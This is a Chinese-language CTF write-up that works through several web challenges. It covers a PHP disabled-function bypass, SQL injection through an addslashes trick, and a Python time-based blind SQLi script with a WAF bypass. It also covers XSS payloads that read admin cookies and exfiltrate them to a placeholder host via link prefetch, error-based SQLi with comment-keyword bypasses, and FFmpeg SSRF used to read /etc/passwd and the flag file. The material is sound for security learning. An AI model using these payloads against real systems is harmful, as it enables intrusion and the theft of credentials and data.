PHP execise
http://106.75.126.194:6789
备用 http://106.75.126.228:6789
输入点是能够执行php代码的,看了一下disabled_function
assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,fopen,file_get_contents,fread,file_get_contents,file,readfile,opendir,readdir,closedir,rewinddir,
对很多文件操作,目录操作函数禁用了,但是当然还是有些没用过滤完整,导致可以列目录,以及对文件的其他操作
列目录
$dir="./";$file=scandir($dir);print_r($file);
copy flag文件为txt文件
copy(\'flag_62cfc2dc115277d0c04ed0f74e48e3e9.php\',\'lemon.txt\');
flag是flag{php_mail_ld_preload},从flag内容来看,感觉这个题目是被非预期的很严重。
瞄了一下其他师傅的wp,还有很多中解法,glob读目录,include、show_source读取文件
wanna to see your hat
http://106.75.106.203:1515
备用 http://61.174.9.233:1515
盲测的时候感觉很懵逼,后面目录扫描发现了svn
http://106.75.106.203:1515/.svn/
svn恢复工具: https://github.com/kost/dvcs-ripper
主要问题还是这个str_replace
因为经过common.php中的addslashes全局对$_POST处理,这样过滤为空的话,就只剩下了\,刚好绕过单引号的限制
http://61.174.9.233:1515/route.php?act=login
name=or/**/1=1%23\'&submit=check
flag{good_job_white_hat}
flag vending machine
http://202.5.20.48/
逻辑是注册用户 -> 登陆 -> 购买
注册的时候有waf,会过滤某些字符为空,比如on,select等
开始没注意,导致登陆的时候会经常出现点莫名其妙的问题
购买的时候,我猜可能是先通过商品的id查询出价钱,然后再从session里面获取用户名,直接update去扣除用户钱包里面的钱,其中从session取值的时候没有做过滤,虽然前面都做了。
import requests
site = \'http://202.5.20.48/\'
url = site + \'register.php\'
url1 = site + \'login.php\'
url2 = site + \'buy.php?id=1\'
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
"Content-Type": "application/x-www-form-urlencoded"}
s = requests.session()
def reg(username):
data = {
\'user\': username,
\'pass\' : \'123456\'
}
r = s.post(url,data=data,headers=headers)
return r.content
def login(username):
user = username.replace(\'on\',\'\')
#print user
data = {
\'user\': user,
\'pass\' : \'123456\'
}
r1 = s.post(url1,data=data,headers=headers)
return r1.content
def get_sql():
r = s.get(url2,timeout=1)
def bypasswaf(payload):
# add on
k = [\'on\',\'ff\']
for i in k:
payload = payload.replace(i,i[0]+\'on\'+i[1:])
l = [\'select\',\'union\',\'where\']
for i in l:
payload = payload.replace(i,i[:3]+\'on\'+i[3:])
# l = [\'limit\']
# for i in l:
# payload = payload.replace(i,i[:2]+\'on\'+i[2:])
return payload
def exp(n):
for i in range(33,127):
#for i in range(97,123):
# n = 25
sql = "select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1"
sql = "select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() limit 0,1"
sql = "select thisi5f14g from fff1ag"
#sql = "select 3456"
sql = bypasswaf(sql)
#user = "lemonkka\'-(if(ord(mid((%s),%d,1))=%d,sleep(2),1))-0#" % (sql,n,i)
user = "zzzkacaa\'-(if(ord(mid((%s),%d,1))=%d,sleep(0.0001),1))-1#" % (sql,n,i)
if \'exited\' in reg(user):
print \'exited!!!!!!!!!!!\'
login(user)
try:
get_sql()
except:
return chr(i)
for i in range(1,30):
print i,\'th: data\'
print exp(i)
可以得到flag: flag{bbb6b6ui1d_5q1_iz_3z}
踩坑踩在#上面,一开始不应该用%23去测,导致半天没效果.
Guestbook
http://106.75.119.64:8888/
大概是绝望,总共是有两个xss点,rename.php、还有一个文本提交
目录结构:
一开始是很熟悉的套路,文本提交那有0ctf出的xss沙盒
利用新建一个iframe可绕过
var iframe = document.createElement(\'iframe\');
iframe.src = \'about:blank\';
document.body.appendChild(iframe);
window.XMLHttpRequest = iframe.contentWindow.XMLHttpRequest;
发现/upload/下是没cookie的
然后仔细研读了首页这几句
hello guest,if you want, you can rname.
You can also send message to the administrator, the administrator will review your.
猜想应该是administrator作为bot去运行文本框输入的xss代码,/admin/review.php提示mb, you are not admin!!!,还以为是rename修改为admin就好了
var pkav = {
ajax: function () {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject(\'Msxml2.XMLHTTP\');
} catch (e) {
try {
xmlHttp = new ActiveXObject(\'Microsoft.XMLHTTP\');
} catch (e) {
return false;
}
}
}
return xmlHttp;
},
req: function (url, data, method, callback) {
method = (method || \'\').toUpperCase();
method = method || \'GET\';
data = data || \'\';
if (url) {
var a = this.ajax();
a.open(method, url, true);
if (method == \'POST\') {
a.setRequestHeader(\'Content-type\', \'application/x-www-form-urlencoded\');
}
a.onreadystatechange = function () {
if (a.readyState == 4 && a.status == 200) {
if (callback) {
callback(a.responseText);
}
}
};
if ((typeof data) == \'object\') {
var arr = [
];
for (var i in data) {
arr.push(i + \'=\' + encodeURIComponent(data[i]));
}
a.send(arr.join(\'&\'));
} else {
a.send(data || null);
}
}
},
get: function (url, callback) {
this.req(url, \'\', \'GET\', callback);
},
post: function (url, data, callback) {
this.req(url, data, \'POST\', callback);
}
};
pkav.post(\'http://106.75.119.64:8888/rename.php\',\'nname=admin\',function(data){
pkav.get(\'http://106.75.119.64:8888/\',function(data){
pkav.get(\'http://106.75.119.64:8888/admin/review.php\',function(data){
var content = window.btoa(document.cookie).concat(window.btoa(data));
var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "//ipipip/".concat(content));
document.head.appendChild(n0t);
});
});
});
请求了一番,从源码、cookie中并未发现flag,最后通过ajax请求/admin/访问时403是无返回的,还以为会把flag藏在这个页面,通过Iframe获取网页信息以及cookie,发现flag在里面,才意识到cookie path路径问题.
<script>
var iframe = document.createElement("iframe");
iframe.setAttribute("src", "/admin/");
document.body.appendChild(iframe);
iframe.addEventListener( "load", function(){
var content = iframe.contentWindow.document.cookie;
var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "//ipipip:8080/".concat(window.btoa(content)));
document.head.appendChild(n0t);
}, false);
</script>
flag:flag{cr4ck_c5p_m4ybe_3z}
方舟计划
http://123.59.71.217
注册的时候,phone存在问题,但是测试发现直接拦截了一些关键字,select from直接拦截,但是可以用select /*!50000from*/去绕过
username=xxee1&phone=-12\' and extractvalue(0x2a,concat(0x2a,(select table_name /*!50000from*/ information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1))) and \'1\'=\'1&password=1234&repassword=1234
查询当前user表的时候需要另外的select一次,可得到用户名、密码
username=xxee1&phone=-12\' and updatexml(1,concat(0x7e,(select a.name /*!50000from*/ (select password as name /*!50000from*/ user where id=1 limit 0,1)a)),0) and \'1&password=1234&repassword=1234
fangzh0u
mIiD2wpTUTnWDzJO6d329w==
从config表中的secrectkey得到一个密钥
AES解密得到密码tencent123
后面就是前段时间出的FFmpeg的ssrf漏洞,可以读取本地文件内容
利用工具:https://github.com/neex/ffmpeg-avi-m3u-xbin
从/proc/self/cmdline获取到网站路径
但是读取web目录源码并未发现flag,读取/etc/passwd上传被拦截了,发现是针对特定的关键字进行拦截,file:///etc//passwd即可绕过,发现
最后读取/home/s0m3b0dy/flag得到flag
做题过程中,学到一个新的姿势点
向数据库插入记录时,有时会有这种需求,当符合某种条件的数据存在时,去修改它,不存在时,则新增,也就是insertOrUpdate操作
INSERT ... ON DUPLICATE KEY UPDATE Syntax
http://blog.csdn.net/ghsau/article/details/23557915